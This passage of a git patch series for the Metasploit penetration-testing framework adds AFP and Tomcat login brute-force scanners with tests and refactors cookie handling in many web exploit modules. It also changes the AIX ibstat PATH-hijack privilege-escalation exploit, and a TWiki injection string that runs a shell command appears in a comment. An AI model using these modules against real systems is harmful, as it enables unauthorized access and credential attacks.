b/lib/metasploit/framework/login_scanner/afp.rb new file mode 100644 index 0000000000..548d1de91d --- /dev/null +++ b/lib/metasploit/framework/login_scanner/afp.rb @@ -0,0 +1,43 @@ +require 'metasploit/framework/tcp/client' +require 'metasploit/framework/afp/client' +require 'metasploit/framework/login_scanner/base' +require 'metasploit/framework/login_scanner/rex_socket' + +module Metasploit + module Framework + module LoginScanner + + # This is the LoginScanner class for dealing with Apple Filing + # Protocol. + class AFP + include Metasploit::Framework::LoginScanner::Base + include Metasploit::Framework::LoginScanner::RexSocket + include Metasploit::Framework::Tcp::Client + include Metasploit::Framework::AFP::Client + + # @!attribute login_timeout + # @return [Integer] Number of seconds to wait before giving up + attr_accessor :login_timeout + + def attempt_login(credential) + begin + connect + rescue Rex::ConnectionError + status = :connection_error + else + success = login(credential.public, credential.private) + status = (success == true) ? :success : :failed + end + + Result.new(credential: credential, status: status) + end + + def set_sane_defaults + self.port = 548 if self.port.nil? + self.max_send_size = 0 if self.max_send_size.nil? + self.send_delay = 0 if self.send_delay.nil? + end + end + end + end +end diff --git a/lib/metasploit/framework/login_scanner/result.rb b/lib/metasploit/framework/login_scanner/result.rb index afa870839a..ad8519ea6d 100644 --- a/lib/metasploit/framework/login_scanner/result.rb +++ b/lib/metasploit/framework/login_scanner/result.rb @@ -28,7 +28,7 @@ module Metasploit # @option opts [Symbol] :status The status code returned def initialize(opts= {}) @access_level = opts.fetch(:access_level, nil) - @credential = opts.fetch(:credential) + @credential = opts.fetch(:credential) @proof = opts.fetch(:proof, nil) @status = opts.fetch(:status) end diff --git a/spec/lib/metasploit/framework/afp/client_spec.rb b/spec/lib/metasploit/framework/afp/client_spec.rb new file mode 100644 index 0000000000..e69de29bb2 diff --git a/spec/lib/metasploit/framework/login_scanner/afp_spec.rb b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb new file mode 100644 index 0000000000..180f80cc5c --- /dev/null +++ b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb @@ -0,0 +1,16 @@ + +require 'spec_helper' +require 'metasploit/framework/login_scanner/afp' + +describe Metasploit::Framework::LoginScanner::AFP do + + subject(:http_scanner) { described_class.new } + + it_behaves_like 'Metasploit::Framework::LoginScanner::Base' + it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' + + it { should respond_to :login_timeout } + + +end + From 8be35b90f4a62954656077102e35ef5899fe9667 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 20 May 2014 17:44:41 -0500 Subject: [PATCH 24/47] Add some more specs for AFP login scanner --- lib/metasploit/framework/login_scanner/afp.rb | 2 +- .../framework/login_scanner/afp_spec.rb | 45 ++++++++++++++++++- 2 files changed, 45 insertions(+), 2 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/afp.rb b/lib/metasploit/framework/login_scanner/afp.rb index 548d1de91d..faa5985c48 100644 --- a/lib/metasploit/framework/login_scanner/afp.rb +++ b/lib/metasploit/framework/login_scanner/afp.rb @@ -22,7 +22,7 @@ module Metasploit def attempt_login(credential) begin connect - rescue Rex::ConnectionError + rescue Rex::ConnectionError, EOFError, Timeout::Error status = :connection_error else success = login(credential.public, credential.private) diff --git a/spec/lib/metasploit/framework/login_scanner/afp_spec.rb b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb index 180f80cc5c..965cfa0f1a 100644 --- a/spec/lib/metasploit/framework/login_scanner/afp_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb @@ -4,13 +4,56 @@ require 'metasploit/framework/login_scanner/afp' describe Metasploit::Framework::LoginScanner::AFP do - subject(:http_scanner) { described_class.new } + subject(:scanner) { described_class.new } it_behaves_like 'Metasploit::Framework::LoginScanner::Base' it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' it { should respond_to :login_timeout } + describe "#attempt_login" do + let(:pub_blank) do + Metasploit::Framework::LoginScanner::Credential.new( + paired: true, + public: "public", + private: '' + ) + end + + it "Rex::ConnectionError should result in status :connection_error" do + expect(scanner).to receive(:connect).and_raise(Rex::ConnectionError) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:connection_error) + end + + it "Timeout::Error should result in status :connection_error" do + expect(scanner).to receive(:connect).and_raise(Timeout::Error) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:connection_error) + end + + it "EOFError should result in status :connection_error" do + expect(scanner).to receive(:connect).and_raise(EOFError) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:connection_error) + end + + it "considers :skip_user to mean failure" do + expect(scanner).to receive(:connect) + expect(scanner).to receive(:login).and_return(:skip_user) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:failed) + end + + end end From 5d1a0397edb135d0eb456b73b52eb1be3f9942a2 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 21 May 2014 14:28:54 -0500 Subject: [PATCH 25/47] Add Tomcat login scanner --- .../framework/login_scanner/tomcat.rb | 25 ++++++ .../framework/login_scanner/http_spec.rb | 78 +------------------ .../framework/login_scanner/tomcat_spec.rb | 11 +++ .../framework/login_scanner/winrm_spec.rb | 8 +- .../framework/login_scanner/http.rb | 78 +++++++++++++++++++ 5 files changed, 118 insertions(+), 82 deletions(-) create mode 100644 lib/metasploit/framework/login_scanner/tomcat.rb create mode 100644 spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb create mode 100644 spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb diff --git a/lib/metasploit/framework/login_scanner/tomcat.rb b/lib/metasploit/framework/login_scanner/tomcat.rb new file mode 100644 index 0000000000..4fa8c9af7c --- /dev/null +++ b/lib/metasploit/framework/login_scanner/tomcat.rb @@ -0,0 +1,25 @@ + +require 'metasploit/framework/login_scanner/http' + +module Metasploit + module Framework + module LoginScanner + + # Tomcat Manager login scanner + class Tomcat < HTTP + + DEFAULT_PORT = 8180 + + # (see Base#set_sane_defaults) + def set_sane_defaults + self.uri = "/manager/html" if self.uri.nil? + self.method = "GET" if self.method.nil? + + super + end + + end + end + end +end + diff --git a/spec/lib/metasploit/framework/login_scanner/http_spec.rb b/spec/lib/metasploit/framework/login_scanner/http_spec.rb index fc6510b654..5b33e8f980 100644 --- a/spec/lib/metasploit/framework/login_scanner/http_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/http_spec.rb @@ -4,84 +4,8 @@ require 'metasploit/framework/login_scanner/http' describe Metasploit::Framework::LoginScanner::HTTP do - subject(:http_scanner) { described_class.new } - it_behaves_like 'Metasploit::Framework::LoginScanner::Base' it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' - - it { should respond_to :uri } - it { should respond_to :method } - - context "#set_sane_defaults" do - - context "without ssl, without port" do - it "should default :port to #{described_class::DEFAULT_PORT}" do - expect(http_scanner.ssl).to be_false - expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) - end - end - - context "with ssl, without port" do - subject(:http_scanner) { described_class.new(ssl:true) } - it "should set :port to default ssl port (#{described_class::DEFAULT_SSL_PORT})" do - expect(http_scanner.ssl).to be_true - expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) - end - end - - context "without ssl, with default port" do - subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_PORT) } - it "should set ssl to false" do - expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) - expect(http_scanner.ssl).to be_false - end - end - - context "without ssl, with default SSL port" do - subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_SSL_PORT) } - it "should set ssl to true" do - expect(http_scanner.ssl).to be_true - expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) - end - end - - context "without ssl, with non-default port" do - subject(:http_scanner) { described_class.new(port:0) } - it "should not set ssl" do - expect(http_scanner.ssl).to be_nil - expect(http_scanner.port).to eq(0) - end - end - - end - - context "#attempt_login" do - let(:pub_blank) { - Metasploit::Framework::LoginScanner::Credential.new( - paired: true, - public: "public", - private: '' - ) - } - - it "Rex::ConnectionError should result in status :connection_error" do - allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Rex::ConnectionError) - - expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) - end - - it "Timeout::Error should result in status :connection_error" do - allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Timeout::Error) - - expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) - end - - it "EOFError should result in status :connection_error" do - allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(EOFError) - - expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) - end - - end + it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP' end diff --git a/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb b/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb new file mode 100644 index 0000000000..4a6607df26 --- /dev/null +++ b/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb @@ -0,0 +1,11 @@ + +require 'spec_helper' +require 'metasploit/framework/login_scanner/tomcat' + +describe Metasploit::Framework::LoginScanner::Tomcat do + + it_behaves_like 'Metasploit::Framework::LoginScanner::Base' + it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' + it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP' + +end diff --git a/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb b/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb index 59295df7fa..13d0637cb9 100644 --- a/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb @@ -4,15 +4,13 @@ require 'metasploit/framework/login_scanner/winrm' describe Metasploit::Framework::LoginScanner::WinRM do - subject(:winrm_scanner) { described_class.new } - it_behaves_like 'Metasploit::Framework::LoginScanner::Base' it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' - - it { should respond_to :uri } - it { should respond_to :method } + it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP' context "#method=" do + subject(:winrm_scanner) { described_class.new } + it "should raise, warning that the :method can't be changed" do expect { winrm_scanner.method = "GET" }.to raise_error(RuntimeError) expect(winrm_scanner.method).to eq("POST") diff --git a/spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb b/spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb new file mode 100644 index 0000000000..44c1fab326 --- /dev/null +++ b/spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb @@ -0,0 +1,78 @@ +shared_examples_for 'Metasploit::Framework::LoginScanner::HTTP' do + subject(:http_scanner) { described_class.new } + + it { should respond_to :uri } + it { should respond_to :method } + + context "#set_sane_defaults" do + + context "without ssl, without port" do + it "should default :port to #{described_class::DEFAULT_PORT}" do + expect(http_scanner.ssl).to be_false + expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) + end + end + + context "with ssl, without port" do + subject(:http_scanner) { described_class.new(ssl:true) } + it "should set :port to default ssl port (#{described_class::DEFAULT_SSL_PORT})" do + expect(http_scanner.ssl).to be_true + expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) + end + end + + context "without ssl, with default port" do + subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_PORT) } + it "should set ssl to false" do + expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) + expect(http_scanner.ssl).to be_false + end + end + + context "without ssl, with default SSL port" do + subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_SSL_PORT) } + it "should set ssl to true" do + expect(http_scanner.ssl).to be_true + expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) + end + end + + context "without ssl, with non-default port" do + subject(:http_scanner) { described_class.new(port:0) } + it "should not set ssl" do + expect(http_scanner.ssl).to be_nil + expect(http_scanner.port).to eq(0) + end + end + + end + + context "#attempt_login" do + let(:pub_blank) { + Metasploit::Framework::LoginScanner::Credential.new( + paired: true, + public: "public", + private: '' + ) + } + + it "Rex::ConnectionError should result in status :connection_error" do + allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Rex::ConnectionError) + + expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) + end + + it "Timeout::Error should result in status :connection_error" do + allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Timeout::Error) + + expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) + end + + it "EOFError should result in status :connection_error" do + allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(EOFError) + + expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) + end + + end +end From 1dbe972377f830db390d4a41e913c64b8a96d61b Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 22 May 2014 12:18:49 -0500 Subject: [PATCH 26/47] Fix URIPATH / for BrowserExploitServer [SeeRM #8804] Fix URIPATH / for BrowserExploitServer --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index d1782616e1..6cd891aa84 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -439,7 +439,7 @@ module Msf # def on_request_uri(cli, request) case request.uri - when get_resource.chomp("/") + when '/', get_resource.chomp("/") # # This is the information gathering stage # From 28459299b205934897294a235f951e700a89dece Mon Sep 17 00:00:00 2001 From: mercd Date: Thu, 22 May 2014 14:16:04 -0700 Subject: [PATCH 27/47] Update ibstat_path.rb Add interface detection, defaulting to en0. --- modules/exploits/aix/local/ibstat_path.rb | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index cb424c1cfe..1ac45dfa97 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -110,8 +110,22 @@ chmod 4555 #{root_file} cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("export PATH") + print_status("Finding interface name...") + iface = "" + cmd_exec("lsdev -Cc if").each_line do |line| + if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/) + iface = line.split(/\s+/)[0] + print_status("Found interface #{iface}.") + break + end + end + if iface == "" + iface = "en0" + print_status("Found no interface, defaulting to en0.") + end + print_status("Triggering vulnerablity...") - cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") + cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null") # The $PATH variable must be restored before the payload is executed # in cases where an euid root shell was gained From 8d4d40b8ba5b0c5d5377895369a0173754a9dda3 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 24 May 2014 00:34:46 +0200 Subject: [PATCH 28/47] Resolved some Set-Cookie warnings --- modules/exploits/multi/http/wikka_spam_exec.rb | 11 ++++++----- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- .../exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 4 ++-- modules/exploits/unix/webapp/foswiki_maketext.rb | 6 +++--- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- .../unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- .../exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++-- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- .../unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 4 ++-- .../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 4 ++-- modules/exploits/unix/webapp/trixbox_langchoice.rb | 4 ++-- modules/exploits/unix/webapp/twiki_maketext.rb | 6 +++--- .../exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 8 ++++---- .../unix/webapp/wp_google_document_embedder_exec.rb | 6 +----- modules/exploits/unix/webapp/zpanel_username_exec.rb | 4 ++-- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++-- .../windows/http/solarwinds_storage_manager_sql.rb | 4 ++-- 21 files changed, 41 insertions(+), 44 deletions(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 20d4a365d3..160a553278 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.headers['Set-Cookie'] - cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + if res and res.get_cookies + cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") end @@ -141,9 +141,10 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => login }) - if res and res.headers['Set-Cookie'] =~ /user_name/ - user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || "" - pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || "" + if res and res.get_cookies =~ /user_name/ + c = res.get_cookies + user = c.scan(/(user_name\@\w+=\w+);/)[0] || "" + pass = c.scan(/(pass\@\w+=\w+)/)[0] || "" cookie_cred = "#{cookie}; #{user}; #{pass}" else cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 57ec58c718..47409ba37f 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with("Login failed") end - sess = login.headers['Set-Cookie'] + sess = login.get_cookies dash = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b18a55f292..3153f03bae 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Detect the phpBB cookie name - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) + if res.get_cookies =~ /(.*)_(sid|data)=/ vprint_status("The server may require a cookie name of '#{$1}_data'") end diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index e8fef8bcbc..96d9b28600 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -56,11 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', }, 10) - if not (res and res.headers['set-cookie']) + if res.nil? || res.get_cookies.empty? fail_with(Failure::NotFound, 'Could not obtain a Session ID') end - sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] + sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index a5b410086f..4701e7cb72 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/ vprint_status "#{res.code}\n#{res.body}" return nil end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("validation_key found: #{validation_key}") if session.empty? - if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ strike_one = $1 else vprint_error("Error getting the FOSWIKISTRIKEONE value") diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ae6cfbfe69..9fb9ac8969 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 303 - @session_id = res["Set-Cookie"] + @session_id = res.get_cookies print_good "#{peer} - Authentication successful" end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index d3d21d0547..930db07be9 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ + if res and res.code == 200 and res.get_cookies =~ /(.+)session/ print_status("#{peer} - Cookie prefix #{$1} found") cookie_prefix = $1 end diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 9645358c82..fa6e2b56d8 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form - if res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ + if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res or res.code != 303 fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end - elsif res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /
/).flatten[0] || '' - cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || '' + cookie = res.get_cookies.scan(/nagiosxi=(\w+); /).flatten[0] || '' return nsp, cookie end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a795414f59..d563f00ad0 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/ + if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/ session = $1 print_status("#{rhost}:#{rport} - Login successful") print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 2ee3f4a4b5..591fcc8ba0 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote return end token = $1 - cookie = response["Set-Cookie"] + cookie = response.get_cookies # There is probably a great deal of randomization that can be done with # this format. diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 1a91c5763e..ad723c98d9 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "user=#{user}&pass=#{pass}", }, 25) - if (res) + if res print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /my_id=(.*)/) + if res.get_cookies =~ /my_id=(.*)/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index e9116a64bd..cacbeb0e67 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -95,12 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }) - if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] + if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty? print_error("#{peer} - Login failed with \"#{username}:#{password}\"") return end - if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ + if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/ session_id = $1 else print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 133b26b8a0..096f669368 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue - cookies = response.headers['Set-Cookie'] + cookies = response.get_cookies # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX @@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status "The server responded to POST with HTTP code #{delivery_response.code}" # We will need the cookie PHPSESSID to continue - cookies = delivery_response.headers['Set-Cookie'] + cookies = delivery_response.get_cookies # Make sure cookies were set if cookies.nil? diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index 5a931d0f21..47bcba11be 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/ return nil end @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("crypttoken found: #{crypttoken}") if session.empty? - if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -225,4 +225,4 @@ end %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% -=end \ No newline at end of file +=end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 4d27bc797b..9194c0958b 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie'] + if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and !res.get_cookies.empty? session = res.get_cookies else return nil diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 9de059083a..b118f8867f 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ + if res and res.code == 302 and res.get_cookies =~ /sid/ vprint_good "#{peer} - Authentication successful" - session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] + session = res.get_cookies.split("sid=")[1].split(";")[0] else vprint_error "#{peer} - Service found, but authentication failed" return Exploit::CheckCode::Detected @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successfully" else diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index d52ecda3a8..917730eeac 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ 